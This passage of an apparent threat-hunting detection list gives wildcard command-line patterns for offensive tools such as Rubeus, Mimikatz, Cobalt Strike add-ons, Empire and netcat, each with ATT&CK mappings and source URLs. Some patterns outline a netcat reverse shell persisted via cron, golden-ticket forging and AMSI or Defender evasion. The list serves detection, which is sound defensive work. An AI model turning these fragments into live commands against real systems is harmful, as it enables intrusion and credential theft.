Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"* ./tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* .\tor.keyring *","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* .beacon_keys -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"* /.exegol/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* /altservice:ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /asrepkey*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /bin/nc * -e /bin/bash* > cron && crontab cron*","greyware_tool_keyword","nc","Linux Persistence Shell cron","T1053 - T1037","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"* /bin/nc * -e /bin/bash*> * crontab cron*","greyware_tool_keyword","nc","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"* /c sc query WinDefend*","greyware_tool_keyword","sc","Get information about Windows Defender service","T1518.001 - T1049","TA0007 - TA0009","N/A","N/A","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"* /cmdtech:* /cmd:* /impuser:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"* /cmdtech:* /cmd:* /query:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"* /create /tn Notion /tr \*cmd.exe* -c *\* /sc onlogon /ru System\*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /createnetonly:*cmd.exe*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /credpassword*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /creduser:* /credpassword:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldap * /printcmd*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ldapfilter:'admincount=1'*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /modules:* /target:* /linkedsql:*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" +"* /NAME:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"* /nofullpacsig *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spn:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /outfile:* /spns:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /PID:* /DRIVER:*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"* /PID:* /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"* /pwdsetafter:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /pwdsetbefore:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /rc4opsec *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4uproxytarget*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4utransitedservices*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /service:krbtgt *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /simple * /spn*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:* /autoenterprise *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:*.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /user:* /domain:* /aes256:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* /user:* /domain:* /ntlm:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* /usetgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* \Temp\blah.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* | Find-AmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* | Test-ContainsAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"* > \\127.0.0.1\ADMIN$\__* 2>&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* > Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* 0.0.0.0:8080 --threads*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* 1.2.3.4:8080*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* 4444 meter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 